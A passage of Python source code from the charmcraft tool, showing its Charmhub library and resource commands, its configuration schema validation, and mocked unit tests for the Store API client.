if v_dir.is_dir() and v_dir.name[0] == "v" and v_dir.name[1:].isdigit():
for libfile in sorted(v_dir.glob("*.py")):
local_libs_data.append(_get_lib_info(lib_path=libfile))
found_libs = [lib_data.full_name for lib_data in local_libs_data]
logger.debug("Libraries found under %s: %s", base_dir, found_libs)
return local_libs_data
class CreateLibCommand(BaseCommand):
"""Create a charm library."""
name = "create-lib"
help_msg = "Create a charm library"
overview = textwrap.dedent(
"""
Create a charm library.
Charmcraft manages charm libraries, which are published by charmers
to help other charmers integrate their charms. This command creates
a new library in your charm which you are publishing for others.
This command MUST be run inside your charm directory with a valid
metadata.yaml. It will create the Python library with API version 0
initially:
lib/charms/<yourcharm>/v0/<name>.py
Each library has a unique identifier assigned by Charmhub that
supports accurate updates of libraries even if charms are renamed.
Charmcraft will request a unique ID from Charmhub and initialise a
template Python library.
Creating a charm library will take you through login if needed.
"""
)
def fill_parser(self, parser):
"""Add own parameters to the general parser."""
parser.add_argument("name", help="The name of the library file (e.g. 'db')")
def run(self, parsed_args):
"""Run the command."""
lib_name = parsed_args.name
valid_all_chars = set(string.ascii_lowercase + string.digits + "_")
valid_first_char = string.ascii_lowercase
if (
set(lib_name) - valid_all_chars
or not lib_name
or lib_name[0] not in valid_first_char
):
raise CommandError(
"Invalid library name. Must only use lowercase alphanumeric "
"characters and underscore, starting with alpha."
)
charm_name = get_name_from_metadata()
if charm_name is None:
raise CommandError(
"Cannot find a valid charm name in metadata.yaml. Check you are in a charm "
"directory with metadata.yaml."
)
# '-' is valid in charm names, but not in a python import
# mutate the name so the path is a valid import
importable_charm_name = create_importable_name(charm_name)
# all libraries born with API version 0
full_name = "charms.{}.v0.{}".format(importable_charm_name, lib_name)
lib_data = _get_lib_info(full_name=full_name)
lib_path = lib_data.path
if lib_path.exists():
raise CommandError("This library already exists: {}".format(lib_path))
store = Store(self.config.charmhub)
lib_id = store.create_library_id(charm_name, lib_name)
# create the new library file from the template
env = get_templates_environment("charmlibs")
template = env.get_template("new_library.py.j2")
context = dict(lib_id=lib_id)
try:
lib_path.parent.mkdir(parents=True, exist_ok=True)
lib_path.write_text(template.render(context))
except OSError as exc:
raise CommandError(
"Error writing the library in {}: {!r}.".format(lib_path, exc)
)
logger.info("Library %s created with id %s.", full_name, lib_id)
logger.info("Consider 'git add %s'.", lib_path)
class PublishLibCommand(BaseCommand):
"""Publish one or more charm libraries."""
name = "publish-lib"
help_msg = "Publish one or more charm libraries"
overview = textwrap.dedent(
"""
Publish charm libraries.
Upload and release in Charmhub the new api/patch version of the
indicated library, or all the charm libraries if --all is used.
It will automatically take you through the login process if
your credentials are missing or too old.
"""
)
def fill_parser(self, parser):
"""Add own parameters to the general parser."""
parser.add_argument(
"library",
nargs="?",
help="Library to publish (e.g. charms.mycharm.v2.foo.); optional, default to all",
)
def run(self, parsed_args):
"""Run the command."""
charm_name = get_name_from_metadata()
if charm_name is None:
raise CommandError(
"Can't access name in 'metadata.yaml' file. The 'publish-lib' command needs to "
"be executed in a valid project's directory."
)
if parsed_args.library:
lib_data = _get_lib_info(full_name=parsed_args.library)
if not lib_data.path.exists():
raise CommandError(
"The specified library was not found at path {}.".format(
lib_data.path
)
)
if lib_data.charm_name != charm_name:
raise CommandError(
"The library {} does not belong to this charm {!r}.".format(
lib_data.full_name, charm_name
)
)
local_libs_data = [lib_data]
else:
local_libs_data = _get_libs_from_tree(charm_name)
# check if something needs to be done
store = Store(self.config.charmhub)
to_query = [dict(lib_id=lib.lib_id, api=lib.api) for lib in local_libs_data]
libs_tips = store.get_libraries_tips(to_query)
to_publish = []
for lib_data in local_libs_data:
logger.debug("Verifying local lib %s", lib_data)
tip = libs_tips.get((lib_data.lib_id, lib_data.api))
logger.debug("Store tip: %s", tip)
if tip is None:
# needs to first publish
to_publish.append(lib_data)
continue
if tip.patch > lib_data.patch:
# the store is more advanced than local
logger.info(
"Library %s is out-of-date locally, Charmhub has version %d.%d, please "
"fetch the updates before publishing.",
lib_data.full_name,
tip.api,
tip.patch,
)
elif tip.patch == lib_data.patch:
# the store has same version numbers than local
if tip.content_hash == lib_data.content_hash:
logger.info(
"Library %s is already updated in Charmhub.", lib_data.full_name
)
else:
# but shouldn't as hash is different!
logger.info(
"Library %s version %d.%d is the same than in Charmhub but content is "
"different",
lib_data.full_name,
tip.api,
tip.patch,
)
elif tip.patch + 1 == lib_data.patch:
# local is correctly incremented
if tip.content_hash == lib_data.content_hash:
# but shouldn't as hash is the same!
logger.info(
"Library %s LIBPATCH number was incorrectly incremented, Charmhub has the "
"same content in version %d.%d.",
lib_data.full_name,
tip.api,
tip.patch,
)
else:
to_publish.append(lib_data)
else:
logger.info(
"Library %s has a wrong LIBPATCH number, it's too high, Charmhub "
"highest version is %d.%d.",
lib_data.full_name,
tip.api,
tip.patch,
)
for lib_data in to_publish:
store.create_library_revision(
lib_data.charm_name,
lib_data.lib_id,
lib_data.api,
lib_data.patch,
lib_data.content,
lib_data.content_hash,
)
logger.info(
"Library %s sent to the store with version %d.%d",
lib_data.full_name,
lib_data.api,
lib_data.patch,
)
class FetchLibCommand(BaseCommand):
"""Fetch one or more charm libraries."""
name = "fetch-lib"
help_msg = "Fetch one or more charm libraries"
overview = textwrap.dedent(
"""
Fetch charm libraries.
The first time a library is downloaded the command will create the needed
directories to place it, subsequent fetches will just update the local copy.
"""
)
def fill_parser(self, parser):
"""Add own parameters to the general parser."""
parser.add_argument(
"library",
nargs="?",
help="Library to fetch (e.g. charms.mycharm.v2.foo.); optional, default to all",
)
def run(self, parsed_args):
"""Run the command."""
if parsed_args.library:
local_libs_data = [_get_lib_info(full_name=parsed_args.library)]
else:
local_libs_data = _get_libs_from_tree()
# get tips from the Store
store = Store(self.config.charmhub)
to_query = []
for lib in local_libs_data:
if lib.lib_id is None:
item = dict(charm_name=lib.charm_name, lib_name=lib.lib_name)
else:
item = dict(lib_id=lib.lib_id)
item["api"] = lib.api
to_query.append(item)
libs_tips = store.get_libraries_tips(to_query)
# check if something needs to be done
to_fetch = []
for lib_data in local_libs_data:
logger.debug("Verifying local lib %s", lib_data)
# fix any missing lib id using the Store info
if lib_data.lib_id is None:
for tip in libs_tips.values():
if (
lib_data.charm_name == tip.charm_name
and lib_data.lib_name == tip.lib_name
):
lib_data = lib_data._replace(lib_id=tip.lib_id)
break
tip = libs_tips.get((lib_data.lib_id, lib_data.api))
logger.debug("Store tip: %s", tip)
if tip is None:
logger.info("Library %s not found in Charmhub.", lib_data.full_name)
continue
if tip.patch > lib_data.patch:
# the store has a higher version than local
to_fetch.append(lib_data)
elif tip.patch < lib_data.patch:
# the store has a lower version numbers than local
logger.info(
"Library %s has local changes, can not be updated.",
lib_data.full_name,
)
else:
# same versions locally and in the store
if tip.content_hash == lib_data.content_hash:
logger.info(
"Library %s was already up to date in version %d.%d.",
lib_data.full_name,
tip.api,
tip.patch,
)
else:
logger.info(
"Library %s has local changes, can not be updated.",
lib_data.full_name,
)
for lib_data in to_fetch:
downloaded = store.get_library(
lib_data.charm_name, lib_data.lib_id, lib_data.api
)
if lib_data.content is None:
# locally new
lib_data.path.parent.mkdir(parents=True, exist_ok=True)
lib_data.path.write_text(downloaded.content)
logger.info(
"Library %s version %d.%d downloaded.",
lib_data.full_name,
downloaded.api,
downloaded.patch,
)
else:
# XXX Facundo 2020-12-17: manage the case where the library was renamed
# (related GH issue: #214)
lib_data.path.write_text(downloaded.content)
logger.info(
"Library %s updated to version %d.%d.",
lib_data.full_name,
downloaded.api,
downloaded.patch,
)
class ListLibCommand(BaseCommand):
"""List all libraries belonging to a charm."""
name = "list-lib"
help_msg = "List all libraries from a charm"
overview = textwrap.dedent(
"""
List all libraries from a charm.
For each library, it will show the name and the api and patch versions
for its tip.
"""
)
def fill_parser(self, parser):
"""Add own parameters to the general parser."""
parser.add_argument(
"name",
nargs="?",
help=(
"The name of the charm (optional, will get the name from"
"metadata.yaml if not given)"
),
)
def run(self, parsed_args):
"""Run the command."""
if parsed_args.name:
charm_name = parsed_args.name
else:
charm_name = get_name_from_metadata()
if charm_name is None:
raise CommandError(
"Can't access name in 'metadata.yaml' file. The 'list-lib' command must "
"either be executed from a valid project directory, or specify a charm "
"name using the --charm-name option."
)
# get tips from the Store
store = Store(self.config.charmhub)
to_query = [{"charm_name": charm_name}]
libs_tips = store.get_libraries_tips(to_query)
if not libs_tips:
logger.info("No libraries found for charm %s.", charm_name)
return
headers = ["Library name", "API", "Patch"]
data = sorted(
(item.lib_name, item.api, item.patch) for item in libs_tips.values()
)
table = tabulate(data, headers=headers, tablefmt="plain", numalign="left")
for line in table.splitlines():
logger.info(line)
class ListResourcesCommand(BaseCommand):
"""List the resources associated with a given charm in Charmhub."""
name = "resources"
help_msg = "List the resources associated with a given charm in Charmhub"
overview = textwrap.dedent(
"""
An overview of the resources associated with a given charm in Charmhub.
Listing resources will take you through login if needed.
"""
)
def fill_parser(self, parser):
"""Add own parameters to the general parser."""
parser.add_argument(
"charm_name", metavar="charm-name", help="The name of the charm"
)
def run(self, parsed_args):
"""Run the command."""
store = Store(self.config.charmhub)
result = store.list_resources(parsed_args.charm_name)
if not result:
logger.info("No resources associated to %s.", parsed_args.charm_name)
return
headers = ["Charm Rev", "Resource", "Type", "Optional"]
by_revision = {}
for item in result:
by_revision.setdefault(item.revision, []).append(item)
data = []
for revision, items in sorted(by_revision.items(), reverse=True):
initial, *rest = sorted(items, key=attrgetter("name"))
data.append(
(revision, initial.name, initial.resource_type, initial.optional)
)
data.extend(
("", item.name, item.resource_type, item.optional) for item in rest
)
table = tabulate(data, headers=headers, tablefmt="plain", numalign="left")
for line in table.splitlines():
logger.info(line)
class _BadOCIImageSpecError(CommandError):
"""Subclass to provide a specific error for a bad OCI Image specification."""
def __init__(self, base_error):
super().__init__(
base_error + " (the format is [organization/]name[:tag|@digest])."
)
def oci_image_spec(value):
"""Build a full OCI image spec, using defaults for non specified parts."""
# separate the organization
if "/" in value:
if value.count("/") > 1:
raise _BadOCIImageSpecError(
"The registry server cannot be specified as part of the image"
)
orga, value = value.split("/")
else:
orga = "library"
# get the digest XOR tag
if "@" in value and ":" in value:
raise _BadOCIImageSpecError("Cannot specify both tag and digest")
if "@" in value:
name, reference = value.split("@")
elif ":" in value:
name, reference = value.split(":")
else:
name = value
reference = "latest"
if not name:
raise _BadOCIImageSpecError("The image name is mandatory")
return OCIImageSpec(organization=orga, name=name, reference=reference)
class UploadResourceCommand(BaseCommand):
"""Upload a resource to Charmhub."""
name = "upload-resource"
help_msg = "Upload a resource to Charmhub"
overview = textwrap.dedent(
"""
Upload a resource to Charmhub.
Push a resource content to Charmhub, associating it to the
specified charm. This charm needs to have the resource declared
in its metadata (in a preoviously uploaded to Charmhub revision).
The resource can be a file from your computer (use the '--filepath'
option) or an OCI Image (use the '--image' option).
The OCI image description uses the [organization/]name[:tag|@digest]
form. The name is mandatory but organization and reference (a digest
or a tag) are optional, defaulting to 'library' and 'latest'
correspondingly.
Upload will take you through login if needed.
"""
)
common = True
def fill_parser(self, parser):
"""Add own parameters to the general parser."""
parser.add_argument(
"charm_name",
metavar="charm-name",
help="The charm name to associate the resource",
)
parser.add_argument(
"resource_name", metavar="resource-name", help="The resource name"
)
group = parser.add_mutually_exclusive_group(required=True)
group.add_argument(
"--filepath",
type=SingleOptionEnsurer(useful_filepath),
help="The file path of the resource content to upload",
)
group.add_argument(
"--image",
type=SingleOptionEnsurer(oci_image_spec),
help="The image specification with the [organization/]name[:tag|@digest] form",
)
def run(self, parsed_args):
"""Run the command."""
store = Store(self.config.charmhub)
if parsed_args.filepath:
resource_filepath = parsed_args.filepath
resource_filepath_is_temp = False
resource_type = ResourceType.file
logger.debug("Uploading resource directly from file %s", resource_filepath)
elif parsed_args.image:
logger.debug(
"Uploading resource from image %s at Dockerhub", parsed_args.image
)
ih = ImageHandler(parsed_args.image.organization, parsed_args.image.name)
final_resource_url = ih.get_destination_url(parsed_args.image.reference)
logger.debug("Resource URL: %s", final_resource_url)
resource_type = "oci-image"
# create a JSON pointing to the unique image URL (to be uploaded to Charmhub)
resource_metadata = {
"ImageName": final_resource_url,
}
_, tname = tempfile.mkstemp(prefix="image-resource", suffix=".json")
resource_filepath = pathlib.Path(tname)
resource_filepath_is_temp = True
resource_filepath.write_text(json.dumps(resource_metadata))
result = store.upload_resource(
parsed_args.charm_name,
parsed_args.resource_name,
resource_type,
resource_filepath,
)
# clean the filepath if needed
if resource_filepath_is_temp:
resource_filepath.unlink()
if result.ok:
logger.info(
"Revision %s created of resource %r for charm %r",
result.revision,
parsed_args.resource_name,
parsed_args.charm_name,
)
else:
logger.info("Upload failed with status %r:", result.status)
for error in result.errors:
logger.info("- %s: %s", error.code, error.message)
class ListResourceRevisionsCommand(BaseCommand):
"""List revisions for a resource of a charm."""
name = "resource-revisions"
help_msg = "List revisions for a resource associated to a charm in Charmhub"
overview = textwrap.dedent(
"""
Show size and date for each resource revision in Charmhub.
For example:
$ charmcraft resource-revisions my-charm my-resource
Revision Created at Size
1 2020-11-15 183151
Listing revisions will take you through login if needed.
"""
)
def fill_parser(self, parser):
"""Add own parameters to the general parser."""
parser.add_argument(
"charm_name",
metavar="charm-name",
help="The charm name to associate the resource",
)
parser.add_argument(
"resource_name", metavar="resource-name", help="The resource name"
)
def run(self, parsed_args):
"""Run the command."""
store = Store(self.config.charmhub)
result = store.list_resource_revisions(
parsed_args.charm_name, parsed_args.resource_name
)
if not result:
logger.info("No revisions found.")
return
headers = ["Revision", "Created at", "Size"]
custom_alignment = ["left", None, "right"]
result.sort(key=attrgetter("revision"), reverse=True)
data = [
(
item.revision,
item.created_at.strftime("%Y-%m-%d"),
naturalsize(item.size, gnu=True),
)
for item in result
]
table = tabulate(
data, headers=headers, tablefmt="plain", colalign=custom_alignment
)
for line in table.splitlines():
logger.info(line)
```
#### File: charmcraft/charmcraft/config.py
```python
import datetime
import pathlib
from urllib.parse import urlparse
import attr
import jsonschema
from charmcraft.cmdbase import CommandError
from charmcraft.utils import load_yaml
format_checker = jsonschema.FormatChecker()
# translator between "json" and pythonic yaml names
TYPE_TRANSLATOR = {
"object": "dict",
"array": "list",
}
def get_field_reference(path):
"""Get a field indicator from the received path."""
if isinstance(path[-1], int):
field = ".".join(list(path)[:-1])
ref = "item {} in '{}' field".format(path[-1], field)
else:
field = ".".join(path)
ref = "'{}' field".format(field)
return ref
def adapt_validation_error(error):
"""Take a jsonschema.ValidationError and create a proper CommandError."""
if error.validator == "required":
msg = "Bad charmcraft.yaml content; missing fields: {}.".format(
", ".join(error.validator_value)
)
elif error.validator == "type":
expected_type = TYPE_TRANSLATOR.get(
error.validator_value, error.validator_value
)
field_ref = get_field_reference(error.absolute_path)
msg = "Bad charmcraft.yaml content; the {} must be a {}: got '{}'.".format(
field_ref, expected_type, error.instance.__class__.__name__
)
elif error.validator == "enum":
field_ref = get_field_reference(error.absolute_path)
msg = "Bad charmcraft.yaml content; the {} must be one of: {}.".format(
field_ref, ", ".join(map(repr, error.validator_value))
)
elif error.validator == "format":
field_ref = get_field_reference(error.absolute_path)
msg = "Bad charmcraft.yaml content; the {} {}: got {!r}.".format(
field_ref, error.cause, error.instance
)
else:
# safe fallback
msg = error.message
raise CommandError(msg)
@format_checker.checks("url", raises=ValueError)
def check_url(value):
"""Check that the URL has at least scheme and net location."""
if isinstance(value, str):
url = urlparse(value)
if url.scheme and url.netloc:
return True
raise ValueError("must be a full URL (e.g. 'https://some.server.com')")
@format_checker.checks("relative_path", raises=ValueError)
def check_relative_paths(value):
"""Check that the received paths are all valid relative ones."""
if isinstance(value, str):
# check if it's an absolute path using POSIX's '/' (not os.path.sep, as the charm's
# config is independent of the platform where charmcraft is running)
if value and value[0] != "/":
return True
raise ValueError("must be a valid relative URL")
@attr.s(kw_only=True, frozen=True)
class CharmhubConfig:
"""Configuration for all Charmhub related options."""
api_url = attr.ib(default="https://api.charmhub.io")
storage_url = attr.ib(default="https://storage.snapcraftcontent.com")
@classmethod
def from_dict(cls, source):
"""Build from a raw dict."""
return cls(**source)
class BasicPrime(tuple):
"""Hold the list of files to include, specified under parts/bundle/prime configs.
This is a intermediate structure until we have the full Lifecycle in place.
"""
@classmethod
def from_dict(cls, parts):
"""Build from a dicts sequence."""
prime = parts.get("bundle", {}).get("prime", [])
return cls(prime)
@attr.s(kw_only=True, frozen=True)
class Project:
"""Configuration for all project-related options, used internally."""
dirpath = attr.ib(default=None)
config_provided = attr.ib(default=None)
started_at = attr.ib(default=None)
@attr.s(kw_only=True, frozen=True)
class Config:
"""Root of all the configuration."""
charmhub = attr.ib(default={}, converter=CharmhubConfig.from_dict)
parts = attr.ib(default={}, converter=BasicPrime.from_dict)
type = attr.ib(default=None)
# this item is provided by the code itself, not the user, as convenience for the
# rest of the code
project = attr.ib(default=None)
CONFIG_SCHEMA = {
"type": "object",
"properties": {
"type": {"type": "string", "enum": ["charm", "bundle"]},
"charmhub": {
"type": "object",
"properties": {
"api_url": {"type": "string", "format": "url"},
"storage_url": {"type": "string", "format": "url"},
},
"additionalProperties": False,
},
"parts": {
"type": "object",
"properties": {
"bundle": {
"type": "object",
"properties": {
"prime": {
"type": "array",
"items": {
"type": "string",
"format": "relative_path",
},
},
},
},
},
},
},
"required": ["type"],
"additionalProperties": False,
}
def load(dirpath):
"""Load the config from charmcraft.yaml in the indicated directory."""
if dirpath is None:
dirpath = pathlib.Path.cwd()
else:
dirpath = pathlib.Path(dirpath).expanduser().resolve()
content = load_yaml(dirpath / "charmcraft.yaml")
if content is None:
# configuration is mandatory only for some commands; when not provided, it will
# be initialized all with defaults (but marked as not provided for later verification)
content = {}
config_provided = False
else:
# config provided! validate the loaded config is ok and mark as such
try:
jsonschema.validate(
instance=content, schema=CONFIG_SCHEMA, format_checker=format_checker
)
except jsonschema.ValidationError as exc:
adapt_validation_error(exc)
config_provided = True
# this timestamp will be used in several places, even sent to Charmhub: needs to be UTC
now = datetime.datetime.utcnow()
# inject project's config
content["project"] = Project(
dirpath=dirpath, config_provided=config_provided, started_at=now
)
return Config(**content)
```
#### File: tests/commands/test_store_api.py
```python
import logging
from unittest.mock import patch, call, MagicMock
import pytest
from dateutil import parser
from charmcraft.utils import ResourceOption
from charmcraft.commands.store.store import Store, Library
@pytest.fixture
def client_mock():
"""Fixture to provide a mocked client."""
client_mock = MagicMock()
with patch(
"charmcraft.commands.store.store.Client", lambda api, storage: client_mock
):
yield client_mock
# -- tests for client usage
def test_client_init(config):
"""Check that the client is initiated ok even without config."""
with patch("charmcraft.commands.store.store.Client") as client_mock:
Store(config.charmhub)
assert client_mock.mock_calls == [
call(config.charmhub.api_url, config.charmhub.storage_url),
]
# -- tests for auth
def test_login(client_mock, config):
"""Simple login case."""
store = Store(config.charmhub)
result = store.login()
assert client_mock.mock_calls == [
call.clear_credentials(),
call.get("/v1/whoami"),
]
assert result is None
def test_logout(client_mock, config):
"""Simple logout case."""
store = Store(config.charmhub)
result = store.logout()
assert client_mock.mock_calls == [
call.clear_credentials(),
]
assert result is None
def test_whoami(client_mock, config):
"""Simple whoami case."""
store = Store(config.charmhub)
auth_response = {"display-name": "<NAME>", "username": "jdoe", "id": "-1"}
client_mock.get.return_value = auth_response
result = store.whoami()
assert client_mock.mock_calls == [
call.get("/v1/whoami"),
]
assert result.name == "<NAME>"
assert result.username == "jdoe"
assert result.userid == "-1"
# -- tests for register and list names
def test_register_name(client_mock, config):
"""Simple register case."""
store = Store(config.charmhub)
result = store.register_name("testname", "stuff")
assert client_mock.mock_calls == [
call.post("/v1/charm", {"name": "testname", "type": "stuff"}),
]
assert result is None
def test_list_registered_names_empty(client_mock, config):
"""List registered names getting an empty response."""
store = Store(config.charmhub)
auth_response = {"results": []}
client_mock.get.return_value = auth_response
result = store.list_registered_names()
assert client_mock.mock_calls == [call.get("/v1/charm")]
assert result == []
def test_list_registered_names_multiple(client_mock, config):
"""List registered names getting a multiple response."""
store = Store(config.charmhub)
auth_response = {
"results": [
{"name": "name1", "type": "charm", "private": False, "status": "status1"},
{"name": "name2", "type": "bundle", "private": True, "status": "status2"},
]
}
client_mock.get.return_value = auth_response
result = store.list_registered_names()
assert client_mock.mock_calls == [call.get("/v1/charm")]
item1, item2 = result
assert item1.name == "name1"
assert item1.entity_type == "charm"
assert not item1.private
assert item1.status == "status1"
assert item2.name == "name2"
assert item2.entity_type == "bundle"
assert item2.private
assert item2.status == "status2"
# -- tests for the upload functionality (both for charm/bundles and resources)
def test_upload_straightforward(client_mock, caplog, config):
"""The full and successful upload case."""
caplog.set_level(logging.DEBUG, logger="charmcraft.commands")
store = Store(config.charmhub)
# the first response, for when pushing bytes
test_upload_id = "test-upload-id"
client_mock.push.return_value = test_upload_id
# the second response, for telling the store it was pushed
test_status_url = "https://store.c.c/status"
client_mock.post.return_value = {"status-url": test_status_url}
# the third response, status ok (note the patched UPLOAD_ENDING_STATUSES below)
test_revision = 123
test_status_ok = "test-status"
status_response = {
"revisions": [
{"status": test_status_ok, "revision": test_revision, "errors": None}
]
}
client_mock.get.return_value = status_response
test_status_resolution = "test-ok-or-not"
fake_statuses = {test_status_ok: test_status_resolution}
test_filepath = "test-filepath"
test_endpoint = "/v1/test/revisions/endpoint/"
with patch.dict(
"charmcraft.commands.store.store.UPLOAD_ENDING_STATUSES", fake_statuses
):
result = store._upload(test_endpoint, test_filepath)
# check all client calls
assert client_mock.mock_calls == [
call.push(test_filepath),
call.post(test_endpoint, {"upload-id": test_upload_id}),
call.get(test_status_url),
]
# check result (build after patched ending struct)
assert result.ok == test_status_resolution
assert result.status == test_status_ok
assert result.revision == test_revision
# check logs
expected = [
"Upload test-upload-id started, got status url https://store.c.c/status",
"Status checked: " + str(status_response),
]
assert expected == [rec.message for rec in caplog.records]
def test_upload_polls_status(client_mock, caplog, config):
"""Upload polls status url until the end is indicated."""
caplog.set_level(logging.DEBUG, logger="charmcraft.commands")
store = Store(config.charmhub)
# first and second response, for pushing bytes and let the store know about it
test_upload_id = "test-upload-id"
client_mock.push.return_value = test_upload_id
test_status_url = "https://store.c.c/status"
client_mock.post.return_value = {"status-url": test_status_url}
# the status checking response, will answer something not done yet twice, then ok
test_revision = 123
test_status_ok = "test-status"
status_response_1 = {
"revisions": [{"status": "still-scanning", "revision": None, "errors": None}]
}
status_response_2 = {
"revisions": [{"status": "more-revisions", "revision": None, "errors": None}]
}
status_response_3 = {
"revisions": [
{"status": test_status_ok, "revision": test_revision, "errors": None}
]
}
client_mock.get.side_effect = [
status_response_1,
status_response_2,
status_response_3,
]
test_status_resolution = "clean and crispy"
fake_statuses = {test_status_ok: test_status_resolution}
with patch.dict(
"charmcraft.commands.store.store.UPLOAD_ENDING_STATUSES", fake_statuses
):
with patch("charmcraft.commands.store.store.POLL_DELAY", 0.01):
result = store._upload("/test/endpoint/", "some-filepath")
# check the status-checking client calls (kept going until third one)
assert client_mock.mock_calls[2:] == [
call.get(test_status_url),
call.get(test_status_url),
call.get(test_status_url),
]
# check result which must have values from final result
assert result.ok == test_status_resolution
assert result.status == test_status_ok
assert result.revision == test_revision
# check logs
expected = [
"Upload test-upload-id started, got status url https://store.c.c/status",
"Status checked: " + str(status_response_1),
"Status checked: " + str(status_response_2),
"Status checked: " + str(status_response_3),
]
assert expected == [rec.message for rec in caplog.records]
def test_upload_error(client_mock, config):
"""The upload ended in error."""
store = Store(config.charmhub)
# the first response, for when pushing bytes
test_upload_id = "test-upload-id"
client_mock.push.return_value = test_upload_id
# the second response, for telling the store it was pushed
test_status_url = "https://store.c.c/status"
client_mock.post.return_value = {"status-url": test_status_url}
# the third response, status in error (note the patched UPLOAD_ENDING_STATUSES below)
test_revision = 123
test_status_bad = "test-status"
status_response = {
"revisions": [
{
"status": test_status_bad,
"revision": test_revision,
"errors": [
{"message": "error text 1", "code": "error-code-1"},
{"message": "error text 2", "code": "error-code-2"},
],
}
]
}
client_mock.get.return_value = status_response
test_status_resolution = "test-ok-or-not"
fake_statuses = {test_status_bad: test_status_resolution}
test_filepath = "test-filepath"
with patch.dict(
"charmcraft.commands.store.store.UPLOAD_ENDING_STATUSES", fake_statuses
):
result = store._upload("/test/endpoint/", test_filepath)
# check result
assert result.ok == test_status_resolution
assert result.status == test_status_bad
assert result.revision == test_revision
error1, error2 = result.errors
assert error1.message == "error text 1"
assert error1.code == "error-code-1"
assert error2.message == "error text 2"
assert error2.code == "error-code-2"
def test_upload_charmbundles_endpoint(config):
"""The bundle/charm upload prepares ok the endpoint and calls the generic _upload."""
store = Store(config.charmhub)
test_results = "test-results"
with patch.object(store, "_upload") as mock:
mock.return_value = test_results
result = store.upload("test-charm", "test-filepath")
mock.assert_called_once_with("/v1/charm/test-charm/revisions", "test-filepath")
assert result == test_results
def test_upload_resources_endpoint(config):
"""The resource upload prepares ok the endpoint and calls the generic _upload."""
store = Store(config.charmhub)
test_results = "test-results"
with patch.object(store, "_upload") as mock:
mock.return_value = test_results
result = store.upload_resource(
"test-charm", "test-resource", "test-type", "test-filepath"
)
expected_endpoint = "/v1/charm/test-charm/resources/test-resource/revisions"
mock.assert_called_once_with(
expected_endpoint, "test-filepath", extra_fields={"type": "test-type"}
)
assert result == test_results
def test_upload_including_extra_parameters(client_mock, caplog, config):
"""Verify that the upload includes extra parameters if given."""
caplog.set_level(logging.DEBUG, logger="charmcraft.commands")
store = Store(config.charmhub)
# the first response, for when pushing bytes
test_upload_id = "test-upload-id"
client_mock.push.return_value = test_upload_id
# the second response, for telling the store it was pushed
test_status_url = "https://store.c.c/status"
client_mock.post.return_value = {"status-url": test_status_url}
# the third response, status ok (note the patched UPLOAD_ENDING_STATUSES below)
test_revision = 123
test_status_ok = "test-status"
status_response = {
"revisions": [
{"status": test_status_ok, "revision": test_revision, "errors": None}
]
}
client_mock.get.return_value = status_response
test_status_resolution = "test-ok-or-not"
fake_statuses = {test_status_ok: test_status_resolution}
test_filepath = "test-filepath"
test_endpoint = "/v1/test/revisions/endpoint/"
extra_fields = {"extra-key": "1", "more": "2"}
with patch.dict(
"charmcraft.commands.store.store.UPLOAD_ENDING_STATUSES", fake_statuses
):
store._upload(test_endpoint, test_filepath, extra_fields=extra_fields)
# check all client calls
assert client_mock.mock_calls == [
call.push(test_filepath),
call.post(
test_endpoint, {"upload-id": test_upload_id, "extra-key": "1", "more": "2"}
),
call.get(test_status_url),
]
# -- tests for list revisions
def test_list_revisions_ok(client_mock, config):
"""One revision ok."""
store = Store(config.charmhub)
client_mock.get.return_value = {
"revisions": [
{
"revision": 7,
"version": "v7",
"created-at": "2020-06-29T22:11:00.123",
"status": "approved",
"errors": None,
}
]
}
result = store.list_revisions("some-name")
assert client_mock.mock_calls == [call.get("/v1/charm/some-name/revisions")]
(item,) = result
assert item.revision == 7
assert item.version == "v7"
assert item.created_at == parser.parse("2020-06-29T22:11:00.123")
assert item.status == "approved"
assert item.errors == []
def test_list_revisions_empty(client_mock, config):
"""No revisions listed."""
store = Store(config.charmhub)
client_mock.get.return_value = {"revisions": []}
result = store.list_revisions("some-name")
assert client_mock.mock_calls == [call.get("/v1/charm/some-name/revisions")]
assert result == []
def test_list_revisions_errors(client_mock, config):
"""One revision with errors."""
store = Store(config.charmhub)
client_mock.get.return_value = {
"revisions": [
{
"revision": 7,
"version": "v7",
"created-at": "2020-06-29T22:11:00.123",
"status": "rejected",
"errors": [
{"message": "error text 1", "code": "error-code-1"},
{"message": "error text 2", "code": "error-code-2"},
],
}
]
}
result = store.list_revisions("some-name")
assert client_mock.mock_calls == [call.get("/v1/charm/some-name/revisions")]
(item,) = result
error1, error2 = item.errors
assert error1.message == "error text 1"
assert error1.code == "error-code-1"
assert error2.message == "error text 2"
assert error2.code == "error-code-2"
def test_list_revisions_several_mixed(client_mock, config):
"""All cases mixed."""
client_mock.get.return_value = {
"revisions": [
{
"revision": 1,
"version": "v1",
"created-at": "2020-06-29T22:11:01",
"status": "rejected",
"errors": [
{"message": "error", "code": "code"},
],
},
{
"revision": 2,
"version": "v2",
"created-at": "2020-06-29T22:11:02",
"status": "approved",
"errors": None,
},
]
}
store = Store(config.charmhub)
result = store.list_revisions("some-name")
(item1, item2) = result
assert item1.revision == 1
assert item1.version == "v1"
assert item1.created_at == parser.parse("2020-06-29T22:11:01")
assert item1.status == "rejected"
(error,) = item1.errors
assert error.message == "error"
assert error.code == "code"
assert item2.revision == 2
assert item2.version == "v2"
assert item2.created_at == parser.parse("2020-06-29T22:11:02")
assert item2.status == "approved"
assert item2.errors == []
# -- tests for release
def test_release_simple(client_mock, config):
"""Releasing a revision into one channel."""
store = Store(config.charmhub)
store.release("testname", 123, ["somechannel"], [])
expected_body = [{"revision": 123, "channel": "somechannel", "resources": []}]
assert client_mock.mock_calls == [
call.post("/v1/charm/testname/releases", expected_body),
]
def test_release_multiple_channels(client_mock, config):
"""Releasing a revision into multiple channels."""
store = Store(config.charmhub)
store.release("testname", 123, ["channel1", "channel2", "channel3"], [])
expected_body = [
{"revision": 123, "channel": "channel1", "resources": []},
{"revision": 123, "channel": "channel2", "resources": []},
{"revision": 123, "channel": "channel3", "resources": []},
]
assert client_mock.mock_calls == [
call.post("/v1/charm/testname/releases", expected_body),
]
def test_release_with_resources(client_mock, config):
"""Releasing with resources attached."""
store = Store(config.charmhub)
r1 = ResourceOption(name="foo", revision=3)
r2 = ResourceOption(name="bar", revision=17)
store.release("testname", 123, ["channel1", "channel2"], [r1, r2])
expected_body = [
{
"revision": 123,
"channel": "channel1",
"resources": [
{"name": "foo", "revision": 3},
{"name": "bar", "revision": 17},
],
},
{
"revision": 123,
"channel": "channel2",
"resources": [
{"name": "foo", "revision": 3},
{"name": "bar", "revision": 17},
],
},
]
assert client_mock.mock_calls == [
call.post("/v1/charm/testname/releases", expected_body),
]
# -- tests for status
def test_status_ok(client_mock, config):
